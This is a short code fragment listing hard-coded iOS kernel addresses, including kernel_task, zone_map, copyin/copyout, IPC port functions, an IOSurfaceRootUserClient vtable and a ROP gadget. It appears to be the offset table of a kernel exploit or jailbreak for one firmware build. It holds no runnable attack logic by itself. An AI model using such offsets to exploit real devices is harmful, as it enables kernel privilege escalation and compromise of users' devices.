OFFSET_ZONE_MAP                             = 0xfffffff007548478;
OFFSET_KERNEL_MAP                           = 0xfffffff0075a4050;
OFFSET_KERNEL_TASK                          = 0xfffffff0075a4048;
OFFSET_REALHOST                             = 0xfffffff00752aba0;
OFFSET_BZERO                                = 0xfffffff007081f80;
OFFSET_BCOPY                                = 0xfffffff007081dc0;
OFFSET_COPYIN                               = 0xfffffff0071806f4;
OFFSET_COPYOUT                              = 0xfffffff0071808e8;
OFFSET_IPC_PORT_ALLOC_SPECIAL               = 0xfffffff007099e94;
OFFSET_IPC_KOBJECT_SET                      = 0xfffffff0070ad16c;
OFFSET_IPC_PORT_MAKE_SEND                   = 0xfffffff0070999b8;
OFFSET_IOSURFACEROOTUSERCLIENT_VTAB         = 0xfffffff006e7b9c8 + 0x1030;
//OFFSET_ROP_ADD_X0_X0_0x10                   = 0xfffffff006466174;
OFFSET_ROP_ADD_X0_X0_0x10                   = 0xfffffff0064b1398;
